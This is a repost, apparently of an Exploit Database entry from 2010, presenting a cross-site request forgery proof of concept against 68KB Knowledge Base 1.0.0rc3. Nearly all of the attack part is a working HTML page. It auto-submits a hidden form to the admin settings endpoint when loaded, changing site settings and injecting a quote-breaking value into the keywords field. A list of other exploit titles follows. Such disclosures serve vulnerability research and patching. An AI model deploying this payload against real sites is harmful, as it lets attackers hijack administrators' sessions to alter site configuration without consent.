68KB Knowledge Base 1.0.0rc3 – Cross-Site Request Forgery (Edit Main Settings)

Exploit Database
93 阅读

作者： Jelmer de Hen

日期： 2010-04-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12022/

Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms['edit_settings'].submit()">
<form name="edit_settings" action="http://server/index.php/admin/settings/main" method="post">
<input type=hidden name="site_name" value="Your Site">
<input type=hidden name="site_keywords" value='">escapable'>
<input type=hidden name="site_description" value="">
<input type=hidden name="site_email" value="a@a.com">
<input type=hidden name="max_search" value="5">
<input type=hidden name="comments" value="5">
<input type=hidden name="cache_time" value="0">
</form>
</body>
</html>

last Exploits
68KB Knowledge Base 1.0.0rc3 – Cross-Site Request Forgery (Edit Main Settings)的更多信息

PHP Gift Registry 1.5.5 – SQL Injection：
EasyService Billing 1.0 – ‘p1’ SQL Injection：
Green Shop – SQL Injection：
IBM RICOH 6400 Printer – HTML Injection：
DotNetNuke DreamSlider 01.01.02 – Arbitrary File Download (Metasploit)：
Online Student’s Management System 1.0 – Remote Code Execution (Authenticated)：
Joomla! Component com_spa – SQL Injection (2)：
Playable 9.18 iOS – Persistent Cross-Site Scripting：